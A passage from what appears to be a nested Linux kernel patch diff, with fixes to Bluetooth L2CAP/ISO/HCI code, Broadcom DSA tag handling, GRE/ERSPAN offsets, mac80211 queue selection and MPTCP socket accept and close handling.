+ 	HCI_INIT(hci_read_flow_control_mode_sync),
+ 	/* HCI_OP_READ_LOCATION_DATA */
+ 	HCI_INIT(hci_read_location_data_sync),
++	{}
+ };
+ 
+ static int hci_init1_sync(struct hci_dev *hdev)
+@@ -3335,6 +3377,7 @@ static int hci_init1_sync(struct hci_dev *hdev)
+ static const struct hci_init_stage amp_init2[] = {
+ 	/* HCI_OP_READ_LOCAL_FEATURES */
+ 	HCI_INIT(hci_read_local_features_sync),
++	{}
+ };
+ 
+ /* Read Buffer Size (ACL mtu, max pkt, etc.) */
+@@ -5376,27 +5419,12 @@ static int hci_active_scan_sync(struct hci_dev *hdev, uint16_t interval)
+ 
+ 	cancel_interleave_scan(hdev);
+ 
+-	/* Pause advertising since active scanning disables address resolution
+-	 * which advertising depend on in order to generate its RPAs.
+-	 */
+-	if (use_ll_privacy(hdev) && hci_dev_test_flag(hdev, HCI_PRIVACY)) {
+-		err = hci_pause_advertising_sync(hdev);
+-		if (err) {
+-			bt_dev_err(hdev, "pause advertising failed: %d", err);
+-			goto failed;
+-		}
+-	}
+-
+-	/* Disable address resolution while doing active scanning since the
+-	 * accept list shall not be used and all reports shall reach the host
+-	 * anyway.
++	/* Pause address resolution for active scan and stop advertising if
++	 * privacy is enabled.
+ 	 */
+-	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
+-	if (err) {
+-		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
+-			   err);
++	err = hci_pause_addr_resolution(hdev);
++	if (err)
+ 		goto failed;
+-	}
+ 
+ 	/* All active scans will be done with either a resolvable private
+ 	 * address (when privacy feature has been enabled) or non-resolvable
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 2dabef488eaae..cb959e8eac185 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -1621,7 +1621,6 @@ static void iso_disconn_cfm(struct hci_conn *hcon, __u8 reason)
+ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ {
+ 	struct iso_conn *conn = hcon->iso_data;
+-	struct hci_iso_data_hdr *hdr;
+ 	__u16 pb, ts, len;
+ 
+ 	if (!conn)
+@@ -1643,6 +1642,8 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 		}
+ 
+ 		if (ts) {
++			struct hci_iso_ts_data_hdr *hdr;
++
+ 			/* TODO: add timestamp to the packet? */
+ 			hdr = skb_pull_data(skb, HCI_ISO_TS_DATA_HDR_SIZE);
+ 			if (!hdr) {
+@@ -1650,15 +1651,19 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 				goto drop;
+ 			}
+ 
++			len = __le16_to_cpu(hdr->slen);
+ 		} else {
++			struct hci_iso_data_hdr *hdr;
++
+ 			hdr = skb_pull_data(skb, HCI_ISO_DATA_HDR_SIZE);
+ 			if (!hdr) {
+ 				BT_ERR("Frame is too short (len %d)", skb->len);
+ 				goto drop;
+ 			}
++
++			len = __le16_to_cpu(hdr->slen);
+ 		}
+ 
+-		len    = __le16_to_cpu(hdr->slen);
+ 		flags  = hci_iso_data_flags(len);
+ 		len    = hci_iso_data_len(len);
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index da85768b04b76..b6f69d1feeeec 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -708,6 +708,17 @@ void l2cap_chan_del(struct l2cap_chan *chan, int err)
+ }
+ EXPORT_SYMBOL_GPL(l2cap_chan_del);
+ 
++static void __l2cap_chan_list_id(struct l2cap_conn *conn, u16 id,
++				 l2cap_chan_func_t func, void *data)
++{
++	struct l2cap_chan *chan, *l;
++
++	list_for_each_entry_safe(chan, l, &conn->chan_l, list) {
++		if (chan->ident == id)
++			func(chan, data);
++	}
++}
++
+ static void __l2cap_chan_list(struct l2cap_conn *conn, l2cap_chan_func_t func,
+ 			      void *data)
+ {
+@@ -775,23 +786,9 @@ static void l2cap_chan_le_connect_reject(struct l2cap_chan *chan)
+ 
+ static void l2cap_chan_ecred_connect_reject(struct l2cap_chan *chan)
+ {
+-	struct l2cap_conn *conn = chan->conn;
+-	struct l2cap_ecred_conn_rsp rsp;
+-	u16 result;
+-
+-	if (test_bit(FLAG_DEFER_SETUP, &chan->flags))
+-		result = L2CAP_CR_LE_AUTHORIZATION;
+-	else
+-		result = L2CAP_CR_LE_BAD_PSM;
+-
+ 	l2cap_state_change(chan, BT_DISCONN);
+ 
+-	memset(&rsp, 0, sizeof(rsp));
+-
+-	rsp.result  = cpu_to_le16(result);
+-
+-	l2cap_send_cmd(conn, chan->ident, L2CAP_LE_CONN_RSP, sizeof(rsp),
+-		       &rsp);
++	__l2cap_ecred_conn_rsp_defer(chan);
+ }
+ 
+ static void l2cap_chan_connect_reject(struct l2cap_chan *chan)
+@@ -846,7 +843,7 @@ void l2cap_chan_close(struct l2cap_chan *chan, int reason)
+ 					break;
+ 				case L2CAP_MODE_EXT_FLOWCTL:
+ 					l2cap_chan_ecred_connect_reject(chan);
+-					break;
++					return;
+ 				}
+ 			}
+ 		}
+@@ -3938,43 +3935,86 @@ void __l2cap_le_connect_rsp_defer(struct l2cap_chan *chan)
+ 		       &rsp);
+ }
+ 
+-void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++static void l2cap_ecred_list_defer(struct l2cap_chan *chan, void *data)
+ {
++	int *result = data;
++
++	if (*result || test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	switch (chan->state) {
++	case BT_CONNECT2:
++		/* If channel still pending accept add to result */
++		(*result)++;
++		return;
++	case BT_CONNECTED:
++		return;
++	default:
++		/* If not connected or pending accept it has been refused */
++		*result = -ECONNREFUSED;
++		return;
++	}
++}
++
++struct l2cap_ecred_rsp_data {
+ 	struct {
+ 		struct l2cap_ecred_conn_rsp rsp;
+-		__le16 dcid[5];
++		__le16 scid[L2CAP_ECRED_MAX_CID];
+ 	} __packed pdu;
++	int count;
++};
++
++static void l2cap_ecred_rsp_defer(struct l2cap_chan *chan, void *data)
++{
++	struct l2cap_ecred_rsp_data *rsp = data;
++
++	if (test_bit(FLAG_ECRED_CONN_REQ_SENT, &chan->flags))
++		return;
++
++	/* Reset ident so only one response is sent */
++	chan->ident = 0;
++
++	/* Include all channels pending with the same ident */
++	if (!rsp->pdu.rsp.result)
++		rsp->pdu.rsp.dcid[rsp->count++] = cpu_to_le16(chan->scid);
++	else
++		l2cap_chan_del(chan, ECONNRESET);
++}
++
++void __l2cap_ecred_conn_rsp_defer(struct l2cap_chan *chan)
++{
+ 	struct l2cap_conn *conn = chan->conn;
+-	u16 ident = chan->ident;
+-	int i = 0;
++	struct l2cap_ecred_rsp_data data;
++	u16 id = chan->ident;
++	int result = 0;
+ 
+-	if (!ident)
++	if (!id)
+ 		return;
+ 
+-	BT_DBG("chan %p ident %d", chan, ident);
++	BT_DBG("chan %p id %d", chan, id);
+ 
+-	pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
+-	pdu.rsp.mps     = cpu_to_le16(chan->mps);
+-	pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
+-	pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
++	memset(&data, 0, sizeof(data));
+ 
+-	mutex_lock(&conn->chan_lock);
++	data.pdu.rsp.mtu     = cpu_to_le16(chan->imtu);
++	data.pdu.rsp.mps     = cpu_to_le16(chan->mps);
++	data.pdu.rsp.credits = cpu_to_le16(chan->rx_credits);
++	data.pdu.rsp.result  = cpu_to_le16(L2CAP_CR_LE_SUCCESS);
+ 
+-	list_for_each_entry(chan, &conn->chan_l, list) {
+-		if (chan->ident != ident)
+-			continue;
++	/* Verify that all channels are ready */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_list_defer, &result);
+ 
+-		/* Reset ident so only one response is sent */
+-		chan->ident = 0;
++	if (result > 0)
++		return;
+ 
+-		/* Include all channels pending with the same ident */
+-		pdu.dcid[i++] = cpu_to_le16(chan->scid);
+-	}
++	if (result < 0)
++		data.pdu.rsp.result = cpu_to_le16(L2CAP_CR_LE_AUTHORIZATION);
+ 
+-	mutex_unlock(&conn->chan_lock);
++	/* Build response */
++	__l2cap_chan_list_id(conn, id, l2cap_ecred_rsp_defer, &data);
+ 
+-	l2cap_send_cmd(conn, ident, L2CAP_ECRED_CONN_RSP,
+-			sizeof(pdu.rsp) + i * sizeof(__le16), &pdu);
++	l2cap_send_cmd(conn, id, L2CAP_ECRED_CONN_RSP,
++		       sizeof(data.pdu.rsp) + (data.count * sizeof(__le16)),
++		       &data.pdu);
+ }
+ 
+ void __l2cap_connect_rsp_defer(struct l2cap_chan *chan)
+@@ -6078,6 +6118,7 @@ static inline int l2cap_ecred_conn_req(struct l2cap_conn *conn,
+ 		__set_chan_timer(chan, chan->ops->get_sndtimeo(chan));
+ 
+ 		chan->ident = cmd->ident;
++		chan->mode = L2CAP_MODE_EXT_FLOWCTL;
+ 
+ 		if (test_bit(FLAG_DEFER_SETUP, &chan->flags)) {
+ 			l2cap_state_change(chan, BT_CONNECT2);
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 0dd30a3beb776..fc4ba0884da96 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -4627,12 +4627,6 @@ static int set_mgmt_mesh_func(struct sock *sk, struct hci_dev *hdev,
+ 				       MGMT_OP_SET_EXP_FEATURE,
+ 				       MGMT_STATUS_INVALID_INDEX);
+ 
+-	/* Changes can only be made when controller is powered down */
+-	if (hdev_is_powered(hdev))
+-		return mgmt_cmd_status(sk, hdev->id,
+-				       MGMT_OP_SET_EXP_FEATURE,
+-				       MGMT_STATUS_REJECTED);
+-
+ 	/* Parameters are limited to a single octet */
+ 	if (data_len != MGMT_SET_EXP_FEATURE_SIZE + 1)
+ 		return mgmt_cmd_status(sk, hdev->id,
+@@ -9352,7 +9346,8 @@ static const struct hci_mgmt_handler mgmt_handlers[] = {
+ 	{ add_ext_adv_data,        MGMT_ADD_EXT_ADV_DATA_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ add_adv_patterns_monitor_rssi,
+-				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE },
++				   MGMT_ADD_ADV_PATTERNS_MONITOR_RSSI_SIZE,
++						HCI_MGMT_VAR_LEN },
+ 	{ set_mesh,                MGMT_SET_MESH_RECEIVER_SIZE,
+ 						HCI_MGMT_VAR_LEN },
+ 	{ mesh_features,           MGMT_MESH_READ_FEATURES_SIZE },
+diff --git a/net/dsa/tag_brcm.c b/net/dsa/tag_brcm.c
+index 16889ea3e0a79..a65d62fb90094 100644
+--- a/net/dsa/tag_brcm.c
++++ b/net/dsa/tag_brcm.c
+@@ -7,6 +7,7 @@
+ 
+ #include <linux/dsa/brcm.h>
+ #include <linux/etherdevice.h>
++#include <linux/if_vlan.h>
+ #include <linux/list.h>
+ #include <linux/slab.h>
+ 
+@@ -248,6 +249,7 @@ static struct sk_buff *brcm_leg_tag_xmit(struct sk_buff *skb,
+ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 					struct net_device *dev)
+ {
++	int len = BRCM_LEG_TAG_LEN;
+ 	int source_port;
+ 	u8 *brcm_tag;
+ 
+@@ -262,12 +264,16 @@ static struct sk_buff *brcm_leg_tag_rcv(struct sk_buff *skb,
+ 	if (!skb->dev)
+ 		return NULL;
+ 
++	/* VLAN tag is added by BCM63xx internal switch */
++	if (netdev_uses_dsa(skb->dev))
++		len += VLAN_HLEN;
++
+ 	/* Remove Broadcom tag and update checksum */
+-	skb_pull_rcsum(skb, BRCM_LEG_TAG_LEN);
++	skb_pull_rcsum(skb, len);
+ 
+ 	dsa_default_offload_fwd_mark(skb);
+ 
+-	dsa_strip_etype_header(skb, BRCM_LEG_TAG_LEN);
++	dsa_strip_etype_header(skb, len);
+ 
+ 	return skb;
+ }
+diff --git a/net/ipv4/ip_gre.c b/net/ipv4/ip_gre.c
+index cae9f1a4e059f..5b8242265617d 100644
+--- a/net/ipv4/ip_gre.c
++++ b/net/ipv4/ip_gre.c
+@@ -552,7 +552,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -561,7 +561,7 @@ static void erspan_fb_xmit(struct sk_buff *skb, struct net_device *dev)
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index c035a96fba3a4..4d5937af08ee9 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -981,7 +981,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		truncate = true;
+ 	}
+ 
+-	nhoff = skb_network_header(skb) - skb_mac_header(skb);
++	nhoff = skb_network_offset(skb);
+ 	if (skb->protocol == htons(ETH_P_IP) &&
+ 	    (ntohs(ip_hdr(skb)->tot_len) > skb->len - nhoff))
+ 		truncate = true;
+@@ -990,7 +990,7 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 		int thoff;
+ 
+ 		if (skb_transport_header_was_set(skb))
+-			thoff = skb_transport_header(skb) - skb_mac_header(skb);
++			thoff = skb_transport_offset(skb);
+ 		else
+ 			thoff = nhoff + sizeof(struct ipv6hdr);
+ 		if (ntohs(ipv6_hdr(skb)->payload_len) > skb->len - thoff)
+diff --git a/net/mac80211/wme.c b/net/mac80211/wme.c
+index ecc1de2e68a50..64430949f6857 100644
+--- a/net/mac80211/wme.c
++++ b/net/mac80211/wme.c
+@@ -144,12 +144,14 @@ u16 ieee80211_select_queue_80211(struct ieee80211_sub_if_data *sdata,
+ u16 __ieee80211_select_queue(struct ieee80211_sub_if_data *sdata,
+ 			     struct sta_info *sta, struct sk_buff *skb)
+ {
++	const struct ethhdr *eth = (void *)skb->data;
+ 	struct mac80211_qos_map *qos_map;
+ 	bool qos;
+ 
+ 	/* all mesh/ocb stations are required to support WME */
+-	if (sta && (sdata->vif.type == NL80211_IFTYPE_MESH_POINT ||
+-		    sdata->vif.type == NL80211_IFTYPE_OCB))
++	if ((sdata->vif.type == NL80211_IFTYPE_MESH_POINT &&
++	    !is_multicast_ether_addr(eth->h_dest)) ||
++	    (sdata->vif.type == NL80211_IFTYPE_OCB && sta))
+ 		qos = true;
+ 	else if (sta)
+ 		qos = sta->sta.wme;
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 938cccab331dd..f0cde2d7233dc 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -834,7 +834,6 @@ static bool __mptcp_finish_join(struct mptcp_sock *msk, struct sock *ssk)
+ 	if (sk->sk_socket && !ssk->sk_socket)
+ 		mptcp_sock_graft(ssk, sk->sk_socket);
+ 
+-	mptcp_propagate_sndbuf((struct sock *)msk, ssk);
+ 	mptcp_sockopt_sync_locked(msk, ssk);
+ 	return true;
+ }
+@@ -2358,7 +2357,6 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		goto out;
+ 	}
+ 
+-	sock_orphan(ssk);
+ 	subflow->disposable = 1;
+ 
+ 	/* if ssk hit tcp_done(), tcp_cleanup_ulp() cleared the related ops
+@@ -2366,14 +2364,22 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	 * reference owned by msk;
+ 	 */
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
++		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
++	} else if (msk->in_accept_queue && msk->first == ssk) {
++		/* if the first subflow moved to a close state, e.g. due to
++		 * incoming reset and we reach here before inet_child_forget()
++		 * the TCP stack could later try to close it via
++		 * inet_csk_listen_stop(), or deliver it to the user space via
++		 * accept().
++		 * We can't delete the subflow - or risk a double free - nor let
++		 * the msk survive - or will be leaked in the non accept scenario:
++		 * fallback and let TCP cope with the subflow cleanup.
++		 */
++		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
++		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN) {
+-			tcp_set_state(ssk, TCP_CLOSE);
+-			mptcp_subflow_queue_clean(sk, ssk);
+-			inet_csk_listen_stop(ssk);
+-		}
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+@@ -2413,9 +2419,10 @@ static unsigned int mptcp_sync_mss(struct sock *sk, u32 pmtu)
+ 	return 0;
+ }
+ 
+-static void __mptcp_close_subflow(struct mptcp_sock *msk)
++static void __mptcp_close_subflow(struct sock *sk)
+ {
+ 	struct mptcp_subflow_context *subflow, *tmp;
++	struct mptcp_sock *msk = mptcp_sk(sk);
+ 
+ 	might_sleep();
+ 
+@@ -2429,7 +2436,15 @@ static void __mptcp_close_subflow(struct mptcp_sock *msk)
+ 		if (!skb_queue_empty_lockless(&ssk->sk_receive_queue))
+ 			continue;
+ 
+-		mptcp_close_ssk((struct sock *)msk, ssk, subflow);
++		mptcp_close_ssk(sk, ssk, subflow);
++	}
++
++	/* if the MPC subflow has been closed before the msk is accepted,
++	 * msk will never be accept-ed, close it now
++	 */
++	if (!msk->first && msk->in_accept_queue) {
++		sock_set_flag(sk, SOCK_DEAD);
++		inet_sk_state_store(sk, TCP_CLOSE);
+ 	}
+ }
+ 
+@@ -2638,6 +2653,9 @@ static void mptcp_worker(struct work_struct *work)
+ 	__mptcp_check_send_data_fin(sk);
+ 	mptcp_check_data_fin(sk);
+ 
++	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		__mptcp_close_subflow(sk);
++
+ 	/* There is no point in keeping around an orphaned sk timedout or
+ 	 * closed, but we need the msk around to reply to incoming DATA_FIN,
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+@@ -2653,9 +2671,6 @@ static void mptcp_worker(struct work_struct *work)
+ 		}
+ 	}
+ 
+-	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+-		__mptcp_close_subflow(msk);
+-
+ 	if (test_and_clear_bit(MPTCP_WORK_RTX, &msk->flags))
+ 		__mptcp_retrans(sk);
+ 
+@@ -3085,6 +3100,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	msk->local_key = subflow_req->local_key;
+ 	msk->token = subflow_req->token;
+ 	msk->subflow = NULL;
++	msk->in_accept_queue = 1;
+ 	WRITE_ONCE(msk->fully_established, false);
+ 	if (mp_opt->suboptions & OPTION_MPTCP_CSUMREQD)
+ 		WRITE_ONCE(msk->csum_enabled, true);
+@@ -3111,8 +3127,7 @@ struct sock *mptcp_sk_clone(const struct sock *sk,
+ 	security_inet_csk_clone(nsk, req);
+ 	bh_unlock_sock(nsk);
+ 
+-	/* keep a single reference */
+-	__sock_put(nsk);
++	/* note: the newly allocated socket refcount is 2 now */
+ 	return nsk;
+ }
+ 
+@@ -3168,8 +3183,6 @@ static struct sock *mptcp_accept(struct sock *sk, int flags, int *err,
+ 			goto out;
+ 		}
+ 
+-		/* acquire the 2nd reference for the owning socket */
+-		sock_hold(new_mptcp_sock);
+ 		newsk = new_mptcp_sock;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_MPCAPABLEPASSIVEACK);
+ 	} else {
+@@ -3727,23 +3740,9 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 		struct mptcp_subflow_context *subflow;
+ 		struct sock *newsk = newsock->sk;
+ 
+-		lock_sock(newsk);
++		msk->in_accept_queue = 0;
+ 
+-		/* PM/worker can now acquire the first subflow socket
+-		 * lock without racing with listener queue cleanup,
+-		 * we can notify it, if needed.
+-		 *
+-		 * Even if remote has reset the initial subflow by now
+-		 * the refcnt is still at least one.
+-		 */
+-		subflow = mptcp_subflow_ctx(msk->first);
+-		list_add(&subflow->node, &msk->conn_list);
+-		sock_hold(msk->first);
+-		if (mptcp_is_fully_established(newsk))
+-			mptcp_pm_fully_established(msk, msk->first, GFP_KERNEL);
+-
+-		mptcp_rcv_space_init(msk, msk->first);
+-		mptcp_propagate_sndbuf(newsk, msk->first);
++		lock_sock(newsk);
+ 
+ 		/* set ssk->sk_socket of accept()ed flows to mptcp socket.
+ 		 * This is needed so NOSPACE flag can be set from tcp stack.
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 6f22ae13c9848..051e8022d6611 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -286,7 +286,8 @@ struct mptcp_sock {
+ 	u8		recvmsg_inq:1,
+ 			cork:1,
+ 			nodelay:1,
+-			fastopening:1;
++			fastopening:1,
++			in_accept_queue:1;
+ 	int		connect_flags;
+ 	struct work_struct work;
+ 	struct sk_buff  *ooo_last_skb;
+@@ -614,7 +615,6 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
+-void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+@@ -651,6 +651,8 @@ void mptcp_subflow_set_active(struct mptcp_subflow_context *subflow);
+ 
+ bool mptcp_subflow_active(struct mptcp_subflow_context *subflow);
+ 
++void mptcp_subflow_drop_ctx(struct sock *ssk);
++
+ static inline void mptcp_subflow_tcp_fallback(struct sock *sk,
+ 					      struct mptcp_subflow_context *ctx)
+ {
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 1e10a38ccf9d0..fc876c2480029 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -355,6 +355,12 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+ 	struct sock *sk = subflow->conn;
+ 
++	/* mptcp_mp_fail_no_response() can reach here on an already closed
++	 * socket
++	 */
++	if (ssk->sk_state == TCP_CLOSE)
++		return;
++
+ 	/* must hold: tcp_done() could drop last reference on parent */
+ 	sock_hold(sk);
+ 
+@@ -630,9 +636,10 @@ static bool subflow_hmac_valid(const struct request_sock *req,
+ 
+ static void mptcp_force_close(struct sock *sk)
+ {
+-	/* the msk is not yet exposed to user-space */
++	/* the msk is not yet exposed to user-space, and refcount is 2 */
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 	sk_common_release(sk);
++	sock_put(sk);
+ }
+ 
+ static void subflow_ulp_fallback(struct sock *sk,
+@@ -648,7 +655,7 @@ static void subflow_ulp_fallback(struct sock *sk,
+ 	mptcp_subflow_ops_undo_override(sk);
+ }
+ 
+-static void subflow_drop_ctx(struct sock *ssk)
++void mptcp_subflow_drop_ctx(struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *ctx = mptcp_subflow_ctx(ssk);
+ 
+@@ -685,6 +692,7 @@ static struct sock *subflow_syn_recv_sock(const struct sock *sk,
+ 	struct mptcp_options_received mp_opt;
+ 	bool fallback, fallback_is_fatal;
+ 	struct sock *new_msk = NULL;
++	struct mptcp_sock *owner;
+ 	struct sock *child;
+ 
+ 	pr_debug("listener=%p, req=%p, conn=%p", listener, req, listener->conn);
+@@ -751,7 +759,7 @@ create_child:
+ 
+ 			if (new_msk)
+ 				mptcp_copy_inaddrs(new_msk, child);
+-			subflow_drop_ctx(child);
++			mptcp_subflow_drop_ctx(child);
+ 			goto out;
+ 		}
+ 
+@@ -759,6 +767,8 @@ create_child:
+ 		ctx->setsockopt_seq = listener->setsockopt_seq;
+ 
+ 		if (ctx->mp_capable) {
++			owner = mptcp_sk(new_msk);
++
+ 			/* this can't race with mptcp_close(), as the msk is
+ 			 * not yet exposted to user-space
+ 			 */
+@@ -767,14 +777,14 @@ create_child:
+ 			/* record the newly created socket as the first msk
+ 			 * subflow, but don't link it yet into conn_list
+ 			 */
+-			WRITE_ONCE(mptcp_sk(new_msk)->first, child);
++			WRITE_ONCE(owner->first, child);
+ 
+ 			/* new mpc subflow takes ownership of the newly
+ 			 * created mptcp socket
+ 			 */
+ 			mptcp_sk(new_msk)->setsockopt_seq = ctx->setsockopt_seq;
+-			mptcp_pm_new_connection(mptcp_sk(new_msk), child, 1);
+-			mptcp_token_accept(subflow_req, mptcp_sk(new_msk));
++			mptcp_pm_new_connection(owner, child, 1);
++			mptcp_token_accept(subflow_req, owner);
+ 			ctx->conn = new_msk;
+ 			new_msk = NULL;
+ 
+@@ -782,15 +792,21 @@ create_child:
+ 			 * uses the correct data
+ 			 */
+ 			mptcp_copy_inaddrs(ctx->conn, child);
++			mptcp_propagate_sndbuf(ctx->conn, child);
++
++			mptcp_rcv_space_init(owner, child);
++			list_add(&ctx->node, &owner->conn_list);
++			sock_hold(child);
+ 
+ 			/* with OoO packets we can reach here without ingress
+ 			 * mpc option
+ 			 */
+-			if (mp_opt.suboptions & OPTIONS_MPTCP_MPC)
++			if (mp_opt.suboptions & OPTIONS_MPTCP_MPC) {
+ 				mptcp_subflow_fully_established(ctx, &mp_opt);
++				mptcp_pm_fully_established(owner, child, GFP_ATOMIC);
++				ctx->pm_notified = 1;
++			}
+ 		} else if (ctx->mp_join) {
+-			struct mptcp_sock *owner;
+-
+ 			owner = subflow_req->msk;
+ 			if (!owner) {
+ 				subflow_add_reset_reason(skb, MPTCP_RST_EPROHIBIT);
+@@ -834,7 +850,7 @@ out:
+ 	return child;
+ 
+ dispose_child:
+-	subflow_drop_ctx(child);
++	mptcp_subflow_drop_ctx(child);
+ 	tcp_rsk(req)->drop_req = true;
+ 	inet_csk_prepare_for_destroy_sock(child);
+ 	tcp_done(child);
+@@ -1748,79 +1764,6 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
+-void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
+-{
+-	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
+-	struct mptcp_sock *msk, *next, *head = NULL;
+-	struct request_sock *req;
+-
+-	/* build a list of all unaccepted mptcp sockets */
+-	spin_lock_bh(&queue->rskq_lock);
+-	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
+-		struct mptcp_subflow_context *subflow;
+-		struct sock *ssk = req->sk;
+-		struct mptcp_sock *msk;
+-
+-		if (!sk_is_mptcp(ssk))
+-			continue;
+-
+-		subflow = mptcp_subflow_ctx(ssk);
+-		if (!subflow || !subflow->conn)
+-			continue;
+-
+-		/* skip if already in list */
+-		msk = mptcp_sk(subflow->conn);
+-		if (msk->dl_next || msk == head)
+-			continue;
+-
+-		msk->dl_next = head;
+-		head = msk;
+-	}
+-	spin_unlock_bh(&queue->rskq_lock);
+-	if (!head)
+-		return;
+-
+-	/* can't acquire the msk socket lock under the subflow one,
+-	 * or will cause ABBA deadlock
+-	 */
+-	release_sock(listener_ssk);
+-
+-	for (msk = head; msk; msk = next) {
+-		struct sock *sk = (struct sock *)msk;
+-		bool do_cancel_work;
+-
+-		sock_hold(sk);
+-		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
+-		next = msk->dl_next;
+-		msk->first = NULL;
+-		msk->dl_next = NULL;
+-
+-		do_cancel_work = __mptcp_close(sk, 0);
+-		release_sock(sk);
+-		if (do_cancel_work) {
+-			/* lockdep will report a false positive ABBA deadlock
+-			 * between cancel_work_sync and the listener socket.
+-			 * The involved locks belong to different sockets WRT
+-			 * the existing AB chain.
+-			 * Using a per socket key is problematic as key
+-			 * deregistration requires process context and must be
+-			 * performed at socket disposal time, in atomic
+-			 * context.
+-			 * Just tell lockdep to consider the listener socket
+-			 * released here.
+-			 */
+-			mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
+-			mptcp_cancel_work(sk);
+-			mutex_acquire(&listener_sk->sk_lock.dep_map,
+-				      SINGLE_DEPTH_NESTING, 0, _RET_IP_);
+-		}
+-		sock_put(sk);
+-	}
+-
+-	/* we are still under the listener msk socket lock */
+-	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
+-}
+-
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+@@ -1877,6 +1820,13 @@ static void subflow_ulp_release(struct sock *ssk)
+ 		 * when the subflow is still unaccepted
+ 		 */
+ 		release = ctx->disposable || list_empty(&ctx->node);
++
++		/* inet_child_forget() does not call sk_state_change(),
++		 * explicitly trigger the socket close machinery
++		 */
++		if (!release && !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW,
++						  &mptcp_sk(sk)->flags))
++			mptcp_schedule_work(sk);
+ 		sock_put(sk);
+ 	}
+ 
+diff --git a/net/sched/act_mirred.c b/net/sched/act_mirred.c
+index b8ad6ae282c02..baeae5e5c8f0c 100644
+--- a/net/sched/act_mirred.c
++++ b/net/sched/act_mirred.c
